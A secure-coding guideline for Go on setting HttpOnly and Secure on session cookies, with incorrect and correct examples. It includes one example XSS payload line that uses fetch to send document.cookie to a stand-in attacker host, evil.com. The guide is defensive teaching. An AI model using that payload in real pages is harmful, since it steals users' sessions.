---
title: Set HttpOnly On Session Cookies
impact: MEDIUM
impactDescription: prevents cookie theft via XSS
tags: cookies, httponly, xss, session, security
---

## Set HttpOnly On Session Cookies

Without HttpOnly, JavaScript can read cookie values, enabling XSS attacks to steal sessions.

**Incorrect (no HttpOnly):**

```go
cookie := &http.Cookie{
    Name:  "session",
    Value: token,
}
// Default HttpOnly is false
```

**Correct (HttpOnly set):**

```go
cookie := &http.Cookie{
    Name:     "session",
    Value:    token,
    HttpOnly: true, // Not accessible to JavaScript
    Secure:   true,
}
http.SetCookie(w, cookie)
```

**XSS attack example (prevented by HttpOnly):**

```javascript
// Attacker's XSS payload (blocked by HttpOnly)
fetch('https://evil.com/steal?cookie=' + document.cookie);
// With HttpOnly, session cookie is NOT in document.cookie
```

**Tools:** Browser DevTools, OWASP ZAP, `http.Cookie`